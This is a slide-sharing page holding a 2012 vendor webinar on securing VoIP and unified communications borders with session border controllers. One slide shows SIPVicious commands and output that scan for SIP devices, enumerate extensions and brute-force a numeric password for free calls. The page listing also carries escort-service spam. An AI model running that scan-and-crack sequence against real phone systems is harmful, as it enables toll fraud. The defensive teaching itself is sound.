Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
 
Bapinger Network Security
Bapinger Network SecurityBapinger Network Security
Bapinger Network Security
 
76 s201919
76 s20191976 s201919
76 s201919
 
PCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaPCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio Panada
 
An approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxAn approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptx
 
6 Steps to SIP trunking security
6 Steps to SIP trunking security6 Steps to SIP trunking security
6 Steps to SIP trunking security
 
Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security
 
Modern Lessons in Security Monitoring
Modern Lessons in Security MonitoringModern Lessons in Security Monitoring
Modern Lessons in Security Monitoring
 
Information Security
Information SecurityInformation Security
Information Security
 
Askozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, English
 
Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Insider threats webinar 01.28.15
Insider threats webinar 01.28.15
 
VoIP security
VoIP securityVoIP security
VoIP security
 
Voippresentation
VoippresentationVoippresentation
Voippresentation
 
Securty Issues from 1999
Securty Issues from 1999Securty Issues from 1999
Securty Issues from 1999
 

KĂźrzlich hochgeladen

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂşjo
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 

KĂźrzlich hochgeladen (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 

Securing UC Borders with Acme Packet

  • 1. February, 2012 Securing your Unified Communications Borders with Acme Packet - in association with The SIP School Patrick McNeil, CISSP Acme Packet Premium Services Graham Francis CEO The SIP School
  • 2. The SIP School • Founded in April 2000 • 5500+ Students • Provide the Industry recognised SSCAÂŽ SIP Certification program, endorsed by the TIA + more. • eLearning in modular format • Unique as content evolves as SIP evolves • Connected with Acme Packet to provide SIP foundation training • http://www.thesipschool.com / Discount codes later. • Now let’s start by looking at the challenges in securing unified communications. 2
  • 3. The Unified Communications security challenge Adopt enterprise-wide IP communications to improve collaboration and productivity... …. All without increasing your risk profile 3
  • 4. Unified Communications services are a prominent target October 2010 - SIPVicious port 5060 scans lead to €11 million loss March 2011 – Romania - Former employee held - Forged VoIP pins created May 2011 - Hudson County, New Jersey Man Pleads Guilty to $4.4 Million VoIP Fraud Scheme November 2011 - Philippine phone phreakers arrested after defrauding AT&T out of $2 Million to fund terrorists 4
  • 5. UC services are an easy target • IP networks are inherently insecure – Developed without security in mind • Organizations rely on IP networks to conduct business – Multimodal communications difficult to control • Confidential information freely exchanged by users that don’t understand how it is transmitted 5
  • 6. Cybercrime is organized • Knowledge, tools and techniques are shared openly • May have goals motivated by politics or profit • Commoditized sale of both the tools and results of the trade – Computing time on a botnet – “Fake” calling cards – Long distance calling with disposable phones – Number hijacking – Toll / international bypass 6
  • 7. What are the threats?
  • 8. How are UC services established? Items in red might reveal sensitive information INVITE sip:15559191212@serviceprovider.com SIP/2.0 Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b From: “JConnor“ <sip:15554141337@10.1.3.3:5060>;tag=18de4db33f To: "15559191212" <sip:15559191212@serviceprovider.com> Call-ID: 19424e0d9187654209ed34db33f CSeq: 1 INVITE Max-Forwards: 70 User-Agent: BigTelcoVendor/R16.4.1.1 SIP Supported: 100rel,timer,replaces,join,histinfo signaling Allow: INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH Contact: “JConnor" <sip:15554141337@10.1.3.3:5060;transport=udp> Content-Type: application/sdp Content-Length: 165 v=0 o=- 1 1 IN IP4 10.1.3.3 s=- c=IN IP4 10.1.3.3 SDP b=AS:64 t=0 0 Media m=audio 19001 RTP/AVP 0 127 description a=rtpmap:0 PCMU/8000 a=rtpmap:127 telephone-event/8000 8
  • 9. How are your services targeted? Voice or video devices, chat, session recording, web integrated real-time communications applications Application CODECs (DSP) Presentation Session SIP, H323, MGCP, H248, TLS (signaling); RTP, RTCP (media) Session Delivery Targets TCP, UDP, SCTP Transport IPv4, IPv6, NAT, IPsec Network Data link technology that supports the transport of IP Data Link Physical Physical technology that supports the transport of data link frames The OSI Model Layers Exploits focused at the middle layers of the OSI model tend to get around traditional security implementations since the whole point is to allow services 9
  • 10. The penetration campaign Reconnaissance Enumeration Attack Gaining Maintaining Covering access access tracks Port scanning Attack, gain and maintain access, Information gathering OS fingerprinting and cover tracks Service detection • Initial phases of an organized attack can easily go undetected • Stopping or making the early phases of an attack difficult can avoid service outage or fraud 10
  • 11. What are the threats? Threat Potential Result Reconnaissance scan Preparation for targeted denial of service, fraud, or theft of service Session overloads Denial of service Protocol fuzzing Denial of service SPAM over Internet Targeted denial of service, fraud, breach of Telephony (SPIT) privacy Call Interception or Targeted denial of service, breach of Session Hijacking privacy, fraud, theft Eavesdropping Breach of privacy, fraud, theft Media injection Denial of service, fraud, theft 11
  • 12. Which threats are seen the most? Overload Resource consumption Attackers Internal Availability disruption A A DoS/DDoS A Internet Unintentional Overload SIP Provider OR Internal Network 12
  • 13. Which threats are seen the most? Theft of services / fraud Large phone bills Attackers Internal A Investigation costs A A Internet SIP Provider OR Internal Network Premium Rate Center 13
  • 14. Which threats are seen the most? SPAM / SPIT Nuisance Attackers Internal A A Social Engineering A Internet SIP Provider OR Internal Network A A A Internal Threat 14
  • 15. Not as much… “Man in the middle” Session-hijacking Attacker Internal Media injection A Remote Control Eavesdropping Internet SIP Provider OR Internal Network A Internal Threat 15
  • 16. A simple example using SIPVicious I just went to your website and got the phone numbers for HR, Support, Investor Relations, etc., and they all seem to end with 1xxx… Scan the IP range registered to your company as reported by ARIN root@bt:/pentest/voip/sipvicious# ./svmap.py -p5060-5061 192.168.133.0/24 | SIP Device | User Agent | Fingerprint | -------------------------------------------------------------------------------- | 192.168.133.128:5060 | Asterisk PBX | Asterisk / SJphone/1.60.289a (SJ Labs) | Enumerate extensions … root@bt:/pentest/voip/sipvicious# ./svwar.py -e1000-9999 192.168.133.128 ------------------------------ | 1005 | reqauth | | 1004 | reqauth | | 1003 | reqauth | | 1002 | noauth | | 1001 | reqauth | We got one extension without a password! It must be misconfigured. Look for numeric passwords for another extension … root@bt:/pentest/voip/sipvicious# ./svcrack.py -u1001 -r1000-999999 192.168.133.128 | Extension | Password | ------------------------ Now just register a couple of soft phones and make free calls! | 1001 | 1234 | 16
  • 17. BUT, wasn’t analog TDM safer? NO! We still saw: • Eavesdropping • Media injection • Caller impersonation • Toll fraud • Physical attacks 17
  • 18. How does Acme Packet secure Unified Communications services?
  • 19. Net-Net E-SBCs control and secure network borders Service Provider IP telephony Conferencing CRM Tele-presence Contact center Enterprise Easy Assured Strong security interoperability reliability • Network • SIP • Quality user border interoperability experience protection • Protocol • Resilient • Privacy interworking services 19
  • 20. Net-SAFE™ Session-Aware Filtering & Enforcement • Hardware & Software DoS/DDoS prevention • Hardware-accelerated encryption & authentication • Dynamic and Static Access control lists • Protocol enforcement and interoperability • Topology hiding and NAT • Session overload protection (upstream/downstream) • Regulatory compliance / legal intercept to recorder • Fraud prevention / endpoint trust management • Routing, high availability and load balancing HW DoS policy SW DoS Routing / Session Management Destination + ACLs policy Availability Endpoint Trust Threshold Management Management Discard 20
  • 21. confidentiality security Confidentiality integrity availability Ensure that information is not disclosed to unauthorized parties
  • 22. Remove identifying data From: JConnor @ my desk To: Customer Obscure the internal structure of your network Via: My PBX Route: PBX, SBC and services so attackers don’t know what or Phone: Brand X Desk Phone, software version x.y.z.1 how to attack Send Audio: To my phone Vendor Specific: Location • Back to Back User Agent (B2BUA) - terminates and re-originates all sessions so we can manipulate them • Topology Hiding – modify or strip signaling message parts that might reveal your internal network or telephony topology From: CorpUser @ SBC To: Customer Via: SBC Route: SBC Send Audio: To SBC 22
  • 23. Authorize and encrypt for privacy and control Enterprise Signaling or media traffic going across an untrusted network should be encrypted to avoid eavesdropping or hijacking, and assure message integrity A • Fast hardware-accelerated Private network Internet encryption • Encryption specified on Campus Branch boundary by boundary basis Legitimate session TLS-encrypted session • Can ensure non-repudiation Sniffing 23
  • 24. confidentiality security Integrity integrity availability Data and systems are not modified or used maliciously or accidentally
  • 25. Assure message integrity Verify the integrity of signaling and media that UAS/UAC Session enters your network to prevent service disruption Control Function Routing Protocol • Attacks are dropped at the Manipulation network processor and won’t Policing Engine impact the CPU or memory Parser Host Based • Signaling is decomposed and Software analyzed for validity against RFC Traffic Manager requirements Classifier Media Control Network Function Signaling Encryption Network Processor Network Interface Embedded Software Media E-SBC 25
  • 26. Prevent fraudulent calls Monitor violations of call thresholds to spot misbehaving hosts, and analyze call detail records to detect fraud patterns • Routing rules can refuse traffic to premium or fraudulent rate centers attacker • SNMP traps to management station indicate potential abuse • Call Detail Record (CDR) feeds can be management station sent “off box” for analysis including metrics for call quality 26
  • 27. confidentiality security Availability integrity availability Reliability and accessibility of data and resources to authorized individuals in a timely manner
  • 28. Denial of Service (DoS) protection Assume hosts are untrusted until they verify their identity through authentication and/or other actions. Establish thresholds to protect against compromised or unintentionally misbehaving hosts • Initial trust level and message thresholds Trusted enforced • Depending on their actions, hosts will be promoted to trusted status or demoted to Untrusted untrusted or denied status • Queues based on trust level make sure services are available even while under Deny DoS attack Dynamic Trust Levels 28
  • 29. Manage service capacities Understand the capacities of your services and limit access so they do not become overwhelmed • Thresholds per session agent Sessions = 500 – Sessions 50% Burst-rate = 10 cps Sustained = 8 cps – Burst rate Sessions = 300 – Sustained rate Burst-rate = 5 cps 30% – Status Sustained = 4 cps • Variable load balancing Sessions = 200 Burst-rate = 4 cps 20% Sustained = 3 cps 29
  • 30. Make UC services resilient Implement hardware and/or site redundancy to minimize the impact of physical attacks to building, power, network, etc. High Availability Multi-site failover • No loss of active sessions • Multiple SIP trunks improve network • Active / Standby failover in 40ms resiliency in disaster recovery scenarios • Checkpointing configuration, media • SBC enables fast failover without & signaling state operator intervention • Preserves CDRs on failover X sessions 30
  • 32. Trust zones provide flexibility Use the SBC to create a virtual firewall DMZ architecture to create multiple zones with different trust levels Low Trust Routing Internet Core / SIP or H.323 I Backbone Sig n Sig SIP or H.323 media t media e Partner r High Trust SIP or H.323 Sig Sig w media o media r Sig k Sig Outsourcer I Internal media n media SIP or H.323 SIP or H.323 g Medium Trust Medium Trust 32
  • 33. Security for SIP trunking applications SIP / MPLS Provider, Internet, or any Untrusted Network Run data firewalls and Acme Packet SBCs in parallel to manage data and communications services in the optimal location DMZ Acme Packet SBC HA Pair Data Network or UC Network or VLAN VLAN 33
  • 34. Security for remote worker access Data centers Send remote users to the SBC instead of your VPN concentrator for message verification, throttling, and best performance without the VPN need for a VPN client TLS/SRTP to SBC vs VPN Tunnel • SIP message integrity verification • SBC can cache client registration, responding to regular client keep-alives • Confidentiality through signaling and Internet media encryption • Easier connectivity & traversal through local firewalls vs. VPN solutions - VPN especially while travelling Teleworker Teleworker 34
  • 36. “Why do I need a SBC when the service provider has one?” • Integrity: The Service Provider SBC is there to protect themselves from Service Provider you • Availability: Routing to SIP gateways and service providers • Interop / Confidentiality: SIP normalization and topology hiding • Quality of Service: Call routing can Customer 1,2,3 …. be dynamically be driven by call quality 36
  • 37. “What do I tell my security department?” • 1,525 customers in 107 countries– the industry standard • Processes calls through both general IP and UC specific attacks • Acme Packet Net-Net SBC certified by the U.S. DISA JITC at Ft. Huachuca, AZ for information assurance and interoperability in DoD networks • Can work in a firewall DMZ if best practices are followed 37
  • 39. Don’t forget to think holistically… Physical security – locks, badges, lighting, emergency exits Data security - 802.1x, LLDP, firewalls, ACLs, VLAN strategy, internal encryption, administrative interfaces, QoS marking and measurement Host security - Anti-virus, control of third party apps and endpoints, patching and configuration of end devices, asset acquisition and disposal Disaster recovery – redundant hardware, services, network Compensating controls - CDR analysis to prevent or detect insider abuse, logging, video surveillance; internal scans or penetration testing Internal controls - hiring policies and security reviews Employee training programs – best practices guidelines and clear expectations; educate employees to recognize social engineering 39
  • 40. Additional resources Acme Packet services, training, sales, or partners http://www.acmepacket.com/ The SIP School http://www.thesipschool.com/ Back | Track Linux VoIP wiki pages http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP Voice Over IP Security Alliance (VOIPSA) http://voipsa.org The SIP Forum http://www.sipforum.org/ Your service provider 40
  • 42. Thank you • sales@acmepacket.com • info@thesipschool.com • The SIP School Discount Code = APDC2204 • Link to webinar recording will be e-mailed to all registered participants 42